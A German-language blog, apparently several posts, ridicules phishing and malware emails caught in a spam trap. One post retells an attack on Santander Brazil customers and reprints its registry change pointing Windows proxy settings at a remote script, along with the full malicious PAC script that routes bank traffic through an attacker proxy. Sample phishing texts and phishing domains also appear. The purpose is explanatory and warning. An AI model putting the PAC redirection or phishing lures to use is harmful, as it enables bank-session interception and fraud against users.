Trojaner Email ohne Trojaner

Das sieht man auch selten, daß ein Angreifer so derbe ins Klo greift mit seiner Virenemail :

Von: WhαtsΑρρ <idealpropertiesspain5964554552565484@idealpropertiesspain.es>
Subject: Situation aktualisiert am 10.03.2018

Sеhr gееhrtеr Кundе

Bittе schauеn Siе sich dеn WhαtsΑρρ -РDF-Anhαng mit diеsеr E-Mαil αn
um Ihr Jαhrеsabonnеmеnt zu vеrlängеrn

Dankе
WhαtsΑρρ-Untеrstüzung

Nicht nur die kryptischen Versuche einer Worterkennung eines Antispamprogramms zu entgehen fallen auf, nein, auch hatten die Angreifer gar kein „PDF“ Attachment an die Email angehängt 🙂

So was nenne ich mal einen richtigen Fail 😀

Wie üblich, ab in die Tonne!

Google Spam – ganz ohne Google :)

Folgender Textbeitrag landete neulich in unserer Spamfalle :

You have 3 lost emails

Google

We have sent you a message.

11/12/2013
3 lost emails has been found and recovered.
View emails
We hope you found this message to be useful. However, if you'd rather not receive future e-mails of this sort, please [Link opt-out here].

Wenn man mal von dem Datum, das 4 !! Jahre in der Vergangenheit liegt absieht, macht die Mail natürlich gar nichts her. Da würde ich nichmal drauf klicken, wenn die wirklich von Google wäre 🙂 Der Opt-Out Link ging dann natürlich an eine völlig andere Webseite : http://www.ads.kalauz.hu/disagreed.php ( keine Panik, liefert nur noch 404 🙂 )

Wie man an den Headern sehen kann :

From: "Support" <polk@link4pc.com>
Message-ID: <5913e6.b157.35c4ec43@link4pc.com>
Subject:  You have 3 lost emails

Kam das nicht mal mit einem gefälschten Googleansender. Als wirklich, was für eine schlampige Arbeit 😀

Auch mal interessant der Spamreport :

 Pkte Regelname Beschreibung 
---- ---------------------- -------------------------------------------------- 
2.4 DATE_IN_FUTURE_03_06 Absendezeit 3 bis 6 Stunden nach Datum in "Received"-Kopfzeilen 
0.0 HTML_MESSAGE BODY: Nachricht enthält HTML 
1.1 MIME_HTML_ONLY BODY: MIME-Nachricht besteht nur aus HTML

Also Angekommen, bevor sie abgesendet wurde 😀 Über soviel Fehler beim Virenverteilen kann  man echt nur noch laut Lachen !

Wie man Onlinebanking belauscht

„Mami, warum darf ich nicht dieses Attachment öffnen?!!“

„DESWEGEN, Kind :  sans.edu – Example of Targeted Attack Through a Proxy PAC File „

Beschrieben wird in dem verlinkten Artikel ein Angriff auf die Benutzer der Santanderbank in Brasilien. Jetzt blocke ich bei mir eh alles was *com.br am Ende hat, da ich in Brasilien keine Freunde habe, aber scheinbar sehr viel zwilichtige Gestalten gerne meine Freund werden wollen, naja.. vermutlich doch eher Freund meines Rechners 🙂 . Egal, jedenfalls spart einem son Block jede Menge Spams auf Portugiesisch, dessen ich zwar entfernt mächtig bin, es mich aber nicht interessiert. Wer noch was pauschal blocken will, hier noch zwei Evergreens : „*com.ar“, „*com.ag“ und „*@zoho.com“ .  Zoho.com ist gefühlt vermutlich die größte Spamschleuder des Planeten.

Was aber tatsächlich am meisten Spams verhindert hat, war unserem Mailserver zu erzählen, daß er nur noch TLS Verbindungen akzeptiert. Das hat sämtliche Spambots kalt erwischt ( und noch dazu das BSI, Weltbild, Power-Netz, Otto und diverse andere Quellen unerwünschter Wer … ähm Newsletter … 😀 )

Man sollte sich auch nichts erzählen lassen, wer als Mailadmin kein TLS aktiviert hat, hat seinen Job nicht ordentlich gemacht. Wer einem also keine EMails mehr senden kann, sollte dafür die Schuld nicht beim Empfänger, sondern bei sich selbst suchen. Im zweiten Jahrzehnt des 21. Jahrhunderts gehört TLS einfach in jeden Mailserver, egal wo auf der Welt.

Zurück zum Angriff auf Kunden der Santander Bank

Der Artikel beschreibt, das eines Tages eine Email kam… so fängt es heute eigentlich immer an ;)… in der ein böses Attachment war.. ( deswegen haben wir Leute auf der Whiteliste, die uns Attachments schicken dürfen ) . Das Attachment enthielt eine kleine Schadsoftware die nichts weiter gemacht hat, als die Proxyeinstellungen von Winblöd zu ändern.

\REGISTRY\USER\S-1-5-21-xxxxxxxx\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL = http://chrome-ie.com.br/1.png

In dem „Bild“ steht natürlich nur Text drin:

function FindProxyForURL(url, host)
{
var a = "PROXY 200.98.202.51:1023";
if (shExpMatch(host, "www.san*ander.com.br*")) {
     return a;
}

if (shExpMatch(host, "san*ander.com.br*")) {
     return a;
}

return "DIRECT";
}

Dieses Proxyscript sorgt dann am Ende dafür, daß die Aufrüfe an die Bank zu dem Proxy Server umgeleitet werden. Damit HTTPS geht, jubelt einem das Attachment dann noch ein FAKE Root Cert der Santander Bank unter.  Fertig ist der Onlinebanking-Man-in-the-Middle-Angriff .

Bei Fragen wenden Sie sich bitte an die Designer von Windows 😀

Virus per Online-Einschreiben :D

Ich habe ja gedacht, ich hätte schon jeden Virengag bekommen, aber ein Online-Einschreiben, angeblich von der Post, ich hätte mich fast weggeworfen vor Lachen.

To: "Kundennr. 83386" <SPAMFALLE@SPAMFALLEN.SPAM>
From: "Post AG" <antwort@wildwildsys.com>
Reply-To: <antwort@wildwildsys.com>
Date: Mon, 27 Jun 2016 05:41:45 +0200

Hier der Inhalt:

Sehr geehrte(r)  Kundennr. 83386,

Sie erhalten folgendes Online-Einschreiben mit der Bitte um sofortigen Abruf:

Absender: Rechtsanwalt Maximilian Wagenbauer
Betreff: Auszahlung am 26.06.2016
Online-Ansicht: Hier klicken ( Ablaufdatum 26.06.2016 )
Viren-Prüfung: Erfolgreich, keine Viren

Mit freundlichen Grüßen,
Ihre Post

 

Das „Einschreiben“ kam einen Tag nach dem Datum da drin , also am 27. 😉

Die Domain wildwildsys.com kann man beruhigt auf die Blackliste setzen, die haben in den letzten Tagen nur Spams und Viren verteilt z.B. eine weitere Email auch aus unserer Spamfalle:

wenn Sie unter 55 Jahre alt sind, können Sie jetzt einen extrem

günstigen Krankenkassentarif nutzen:

unter 35 Jahre altab 54,90€/MonatJetzt unverbindlich ansehen
unter 45 Jahre altab 64,90€/MonatJetzt unverbindlich ansehen
unter 55 Jahre altab 79,00€/ MonatJetzt unverbindlich ansehen

Sie sehen, ein Vergleich würde sich in Ihrem Fall sehr lohnen.

Natürlich ist der Vergleich absolut kostenlos und unverbindlich. Mehr dazu auf meiner Seite.

Mit freundlichen Grüßen,

Dr. Hannes Kottke

Ich liebe unsere immer zu 100% richtig liegende Spamfalle 😀

Die Links in diesen Emails gehen praktischerweise auf die Domain wildwildsys.com und nicht wie sonst üblich, auf irgendwelche gehackten Webseiten. Daher kann man annehmen, daß die Betreiber der Domain selbst die Betrüger sind. Soetwas nennt sich dann hochtrabend „Email-Marketingagentur“. Da die Inhaber der Domain sich hinter einem „Privacy Guard“ verstecken, liege ich vermutlich richtig mit meiner Annahme 😉

Einmal gründlich hinsehen lohnt sich : (aus dem Whois )

Name Server: BLOCKEDDUETOSPAM.PLEASECONTACTSUPPORT.COM
Name Server: DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM

Strike! 😀  Und die Domain gibt wirklich …. args..

Sollte Euch also eine Email unter kommen, die diesen Domainnamen nutzt, gleich in die Tonne damit.

dumm – dümmer – Bundestag

Wie gestern bekannt wurde, hat das BSI herausgefunden, wie der Angriff auf den Bundestag abgelaufen ist. Es war ein Insiderjob, denn wie sich herausgestellt hat, sind Bundestagsmitarbeiter und -abgeordnete nicht schlauer als der Durchschnittsbürger.

Der Klassiker: Sie bekommen eine Email mit einem Link drin und klicken einfach drauf.

Nochmal für alle :

1. Keine Emails von Fremden öffnen, auf die man nicht wartet.
2. Keine Links und Emails von Fremden anklicken
3. Wenn man schon 1. + 2. ignoriert, dann nur mit einem Browser bei dem Flash und Javascript abgeschaltet sind und der NICHT von Microsoft stammt.
4. Sich nicht bei den Leuten beschweren, die einem ins Gesicht gesagt haben, daß man selbst Schuld sei an seinem Opferstatus.

Ein bisschen Literatur zum Nachlesen: Archiv